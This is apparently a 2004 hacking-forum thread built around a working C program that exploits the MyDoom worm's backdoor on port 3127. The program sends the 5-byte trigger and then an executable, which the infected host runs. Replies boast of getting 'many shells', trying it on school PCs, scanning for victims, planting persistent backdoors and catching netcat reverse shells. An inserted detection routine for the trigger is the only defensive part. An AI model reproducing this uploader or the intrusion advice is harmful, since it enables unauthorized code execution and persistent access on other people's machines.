can't compile, can u post the compiled version plz, lcc won't do it
mamep
Feb 10 2004, 12:54 AM
nice xploit
Rocky2you
Feb 10 2004, 01:02 AM
Can't compile it.... whatever I try it just won't. Can anybody compile that last script that spike posted?? Would appreciate it very much. Thanks fellas
m1k3
Feb 10 2004, 02:44 AM
about half of all my scans work which is good im securing them as i go along heh ;p
Major Chrome
Feb 10 2004, 02:52 AM
Why not post the errors you get, at least that way people know you are trying to compile it and might help you out.
Erra
Feb 10 2004, 04:16 AM
This is a really interesting post. I find it amusing to see the knowledgeable replies and the not so.
Nice work to all involved with this one
slb33
Feb 10 2004, 05:38 AM
Very nice little appz these are
Working great, thanks
technoboy
Feb 10 2004, 06:24 AM
just tested it, work like a charm
thanks again !
Carlos
Feb 10 2004, 06:54 AM
Both methods work perfectly. Thank you sPiKie and clip for spending the time to code/modify each others code to make the exploit a bit more "user friendly", if I may, and for sharing the source.
Let's see how long this baby lasts...
Alien
Feb 10 2004, 08:19 AM
here is code modified by me, compile this with lcc
CODE
/**************************************/
/* Copyrights 2004 sPiKie tha m4st3r */
/* Made to a friend */
/**************************************/
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#pragma lib <ws2_32.lib>

int main(int argc,char *argv[])
{
    int sockfd, numbytes;
    struct hostent *he;
    struct sockaddr_in their_addr; // connector's address information
    char doompassword[] = "\x85\x13\x3c\x9e\xa2"; //the backdoors uses a password to open CreateProcess();)
    char buf[1024];
    int read=0;
    FILE *fuckfile;
    WSADATA wsaData; //thihihi

    fuckfile = fopen(argv[3],"rb");
    if (fuckfile==NULL) {
        printf("[-] Open Failed\n");
        return -1;
    }
    printf("[+] File found ready to send\n");
    if(WSAStartup(0x101,&wsaData)) {
        printf("[-] Unable to load winsock.\n");
        return -1;
    }
    if ((he=gethostbyname(argv[1])) == NULL) { // get the host info
        printf("[-] GetHostByName() Error!\n");
        return -1;
    }
    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        printf("[-] Can't open socket!\n");
        return -1;
    }
    their_addr.sin_family = AF_INET; // host byte order
    their_addr.sin_port = htons(atoi(argv[2])); // port
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    //memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct
    if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1) {
        printf("[-] Connecting error\n");
        return -1;
    }
    printf("[+] Connected\n[+] Sending executable.\n");
    send(sockfd,doompassword,5,0); //sending the password :)
    while (!feof(fuckfile)) {
        read = fread(buf,sizeof(char),sizeof(buf),fuckfile);
        if ((numbytes=send(sockfd,buf,read,0)) == -1) {
            printf("[-] Sending executable failed\n");
            return -1;
        }
        printf(".");
    }
    printf("[+] All done, server have now executed your executable!\n");
    closesocket(sockfd);
    WSACleanup();
    return 0;
}
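Added example, not part of the original thread or any poster's code: a stream matcher that a network sensor could run on the client-to-server bytes of connections to port 3127, flagging the 5-byte sequence from the code above even when it arrives split across TCP segments. The names `stream_state`, `stream_feed` and the verdict values are hypothetical, and the `MZ` check assumes the uploaded body is a Windows PE executable.

```c
#include <stdio.h>
#include <string.h>

/* 5-byte sequence the uploader above sends before the file body. */
static const unsigned char TRIGGER[5] = {0x85, 0x13, 0x3c, 0x9e, 0xa2};

enum verdict { NEED_MORE, BENIGN, TRIGGER_SEEN, TRIGGER_PLUS_EXE };

/* Per-connection state (hypothetical struct for this example). */
struct stream_state {
    unsigned char head[7]; /* first client bytes: trigger + 2-byte magic */
    size_t have;           /* how many of them have arrived so far */
};

void stream_init(struct stream_state *s) { memset(s, 0, sizeof *s); }

/* Feed one in-order client-to-server segment; returns the verdict so far. */
enum verdict stream_feed(struct stream_state *s,
                         const unsigned char *seg, size_t len)
{
    size_t room = sizeof s->head - s->have;
    size_t take = len < room ? len : room;
    size_t cmp;
    memcpy(s->head + s->have, seg, take);
    s->have += take;
    cmp = s->have < sizeof TRIGGER ? s->have : sizeof TRIGGER;
    if (memcmp(s->head, TRIGGER, cmp) != 0)
        return BENIGN;        /* stream diverged from the trigger */
    if (s->have < sizeof TRIGGER)
        return NEED_MORE;     /* matching prefix, trigger incomplete */
    if (s->have < sizeof s->head)
        return TRIGGER_SEEN;  /* full trigger, body not yet visible */
    /* Assumption: an uploaded Windows executable starts with "MZ". */
    return (s->head[5] == 'M' && s->head[6] == 'Z') ? TRIGGER_PLUS_EXE
                                                    : TRIGGER_SEEN;
}

int main(void)
{
    /* Constructed sample: trigger split over two segments, then "MZ". */
    const unsigned char a[] = {0x85, 0x13, 0x3c};
    const unsigned char b[] = {0x9e, 0xa2, 'M', 'Z', 0x90};
    struct stream_state s;

    stream_init(&s);
    stream_feed(&s, a, sizeof a);
    printf("verdict=%d\n", stream_feed(&s, b, sizeof b));
    return 0;
}
```

A `TRIGGER_SEEN` verdict on its own is still worth alerting on, since the body that follows need not be a PE file.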
Cow|
Feb 10 2004, 09:13 AM
Thankx for this nice exploit it works like a charm
TheOther
Feb 10 2004, 09:16 AM
Exploit works great!!!!
Just wondering how we can patch the server through shell?
Thx
Stephen79
Feb 10 2004, 10:08 AM
QUOTE (TheOther @ Feb 10 2004, 10:16 AM)
Exploit works great!!!!
Just wondering how we can patch the server through shell?
Thx
there are many ways you could go about that, the easiest is to run the command line fixer.
just look around the board and you will see it's already been posted. It's not hard to find on google anyway.
clubfed
Feb 10 2004, 10:09 AM
QUOTE (TheOther @ Feb 10 2004, 09:16 AM)
Exploit works great!!!!
Just wondering how we can patch the server through shell?
Thx
you're kidding right? download mydoomerremove.exe to your local dir (search these forums if you don't have it) then just upload/exec *that* just like you did your trojan a few minutes ago. why not use the same interface. i've patched the *few* servers i've found. this is a dead/lame bug... hardly any infected machines at all. it was all media hype/bragging up to get money.
clubfed
Feb 10 2004, 10:11 AM
QUOTE (clubfed @ Feb 10 2004, 10:09 AM)
QUOTE (TheOther @ Feb 10 2004, 09:16 AM)
Exploit works great!!!!
Just wondering how we can patch the server through shell?
Thx
you're kidding right? download mydoomerremove.exe to your local dir (search these forums if you don't have it) then just upload/exec *that* just like you did your trojan a few minutes ago. why not use the same interface. i've patched the *few* servers i've found. this is a dead/lame bug... hardly any infected machines at all. it was all media hype/bragging up to get money.
these two commands should do it, worked for me, but i have cygwin installed and thus wget. if you don't then just go get that fix manually and save it to the same dir. you get the idea.
by the way... i posted this in another thread earlier, but basically for all the silly people who begged me for the mydoom uploader (this was back in january!) that didn't just read the advisory... it was this simple (since it's leaked now...)
(yes i know trigger is slightly different, but that's what i used based on disassembly of worm and it worked)
it was never any good, since the worm barely spread at all, it was a totally overhyped bug and really worthless overall. consider that you can scan a class c for winxp machines and root 10 at a time using workstation service overflow, why bother with things like this?
anyway...
Yemoke
Feb 10 2004, 10:24 AM
wow i think this is a very good exploit 2 of this hosts: Transferred: 2mb.nul 2,00 MB in 2,63 (777,52 KBps)
nutschi
Feb 10 2004, 10:39 AM
lolz, finally its here and i´m late again, thx
rush
Feb 10 2004, 10:41 AM
Very good, i hope a lot of kiddies get caught! I know someone who get hacked hacking a Dutch university, all his pc's were taken in. He connected just once or so...
nubela
Feb 10 2004, 12:19 PM
hmm. compiled it nicely. but mydoom scanner from foundstone.com seems crap. how do u guys scan for vulnerable?
Jimbras
Feb 10 2004, 12:24 PM
Ni hack this one. Works great
Thanks for it
bambipower
Feb 10 2004, 12:36 PM
damn, people start to send pm for the compiled version
tssss
Stephen79
Feb 10 2004, 12:43 PM
QUOTE (nubela @ Feb 10 2004, 01:19 PM)
hmm. compiled it nicely. but mydoom scanner from foundstone.com seems crap. how do u guys scan for vulnerable?
you're joking right?
XpProf
Feb 10 2004, 01:11 PM
Many THX..very good exploit
Xp
Deltax
Feb 10 2004, 01:18 PM
QUOTE (nubela @ Feb 10 2004, 12:19 PM)
hmm. compiled it nicely. but mydoom scanner from foundstone.com seems crap. how do u guys scan for vulnerable?
just scan for servers with port 3127 open..
adenek
Feb 10 2004, 01:38 PM
work perfect many thx man
tolf
Feb 10 2004, 01:45 PM
yeah nice work guys.. compiles fine. Now just want to test it
Hey has anyone got the actual Mydoom virus files on hand... I wanna try this in a restricted lab area on an infected machine...
night^man
Feb 10 2004, 01:53 PM
thx got many shells
DeGast
Feb 10 2004, 01:56 PM
Thx this exploit works great! Got many shells!
x1`
Feb 10 2004, 02:12 PM
bad thing if we start securing as there will be less vulnerable servers and the exploit will die more quickly. but it's good so someone else can't hack urs, but what if the admin catches your files, how are u gonna restart servu or something, if u can't get shell any more
Homer
Feb 10 2004, 02:20 PM
just install backdoor
man many noobs here, just read up and all ur questions will be answered. It will die soon so njoy for now
sPiKie
Feb 10 2004, 02:25 PM
Thanks for all this great feedback, but one person in here that I didn't like.. I hope the admins also saw it.. Alien said he had modified my code, he didn't do ANYTHING, nothing is modified. So Alien, don't try to play.. The game is over. And you lost like hell!
Or if you can say: #pragma comment (lib,"ws2_32") changing to #pragma comment (lib,"ws2_32.lib") So it works in the poor compiler lcc... So please, don't say you modified, say you modified it so it can be compiled in LCC...
XtrA
Feb 10 2004, 02:26 PM
I have a question.. hmm when i create a shell with rsCRT i should enter my ip there.. but when i connect to the internet i get another ip.. my ip number changes.. so.. is it saying that i should create new file all the time?
negyta
Feb 10 2004, 02:42 PM
@Xtra:
Yep, u always have to change the ip in the .exe file when u have a dynamic ip
Get yourself a remote box (hacked or non-hacked) with a static ip and hack over this box.
hulk
Feb 10 2004, 03:07 PM
has anyone been able to execute anything after you get the shell? I can't get any exe files to execute once they are on the exploited server
x1`
Feb 10 2004, 03:24 PM
which back door is best if the computer restarts and the backdoor restarts with it and not able to be found , ive just used netcat to spawn a backdoor for now
Vosgia
Feb 10 2004, 03:40 PM
do you think it belongs in this topic? Dickybob20? i don't think so
Big thanks goes to sPiKie. Very nice post but 10 pages up to now. You can see how many script kiddies were waiting for a "better" exploit than "dameware"
clip
Feb 10 2004, 05:13 PM
QUOTE (sPiKie @ Feb 10 2004, 02:25 PM)
Thanks for all this great feedback, but one person in here that I didn't like.. I hope the admins also saw it.. Alien said he had modified my code, he didn't do ANYTHING, nothing is modified. So Alien, don't try to play.. The game is over. And you lost like hell!
How the hell can you say that when you blatantly ripped my code? (Although i don't care).
The command prompt has been disabled by your administrator.
execute: gpedit.msc Local Computer Policy->User Configuration->Administrative Templates->System
Under this tab there is a setting that can be used to prevent access to cmd.exe.
So in clear it means what the message told you, cmd.exe has been disabled by the administrator. Ever heard of google btw?
Erra
Feb 10 2004, 06:14 PM
OK now I have a question, I get this all the time...
[+] Opening File
[+] File found ready to send
[-] Unable to load winsock.
what the hell does that mean?
I haven't seen this one asked here yet, so either, no one has had it, or, it's a stupid question, but I don't know the answer to it, so any assistance would be nice thanks
sPiKie
Feb 10 2004, 06:24 PM
Erra, it means that you can't load WinSock on your computer... Hmm if you want to check it, just call WSAGetLastError(); That's all, just try to do it on another computer or get the newest updates/winsock etc..
ducky
Feb 10 2004, 06:47 PM
tried 5 School PC's till now...to check if it works...but no admin rights... maybe there is a need to change something in the exploit itself??
cheerz
technoboy
Feb 10 2004, 06:57 PM
the exploit works 100%, it's just you guys who are not using it correctly.
f4u2t
Feb 10 2004, 07:43 PM
Heh, thx a lot, i tried this, really works! but, IMHO, it's old, because i scan only few 3127...
sorry for my english ;]]]
Nexcess
Feb 10 2004, 07:58 PM
well.. on the bright side you guys have successfully cleaned half the infected mydoom servers over night
liquidSilver
Feb 10 2004, 08:10 PM
6525 views on this topic - in only 1 day! 1 day!
I think it's cool that we cleaned most computers! Awesome!
Fantafour
Feb 10 2004, 08:15 PM
QUOTE (sPiKie @ Feb 9 2004, 06:15 PM)
FakoLy, I think it will go to the /windows/system32 directory as another name, but it will delete itself after the exploit.. The program uses the Win function CreateProcess() ..
then, is it right that when i upload another .bat file, it deletes it automatically?
[+] Reading file to send (max length 1599bytes) ...Done
[+] Connecting to infected ip ...Done
[+] Sending file ...Done
[+] Exiting.
now one problem in netcat it drops this ..........
CODE
C:\>nc -l -vv -p xxxx -t
listening on [any] xxxx ...
connect to [bla.bla.bla.bla] from res-bla-xx-bla.bla.bla.edu [xxx.x.xx.xxx] 3066
sent 0, rcvd 0
C:\>
Why do you think maybe i have no exec. rights ?
sPiKie
Feb 10 2004, 09:02 PM
By the way guys in here.. Don't use those exploits/tools on other computers than your own/or testing it with friends... And for those that didn't know that I'm not a blackhat, they know it now. I'm a 99.9999% Whitehat security coder/whatsoever. And please, I don't help to hack, I help to find the vulnerabilities so the big companies, virusscanners etc.. That they can protect the computers from getting caught.. What a good thing I did do on some friends, was this, I just uploaded the fixer via my tool and whooops MyDoom and of course the backdoor was gone. Help me clean the MyDoom's away and start DELETING the MyDoom viruses. For those that don't do this, they aren't under my respect... Thanks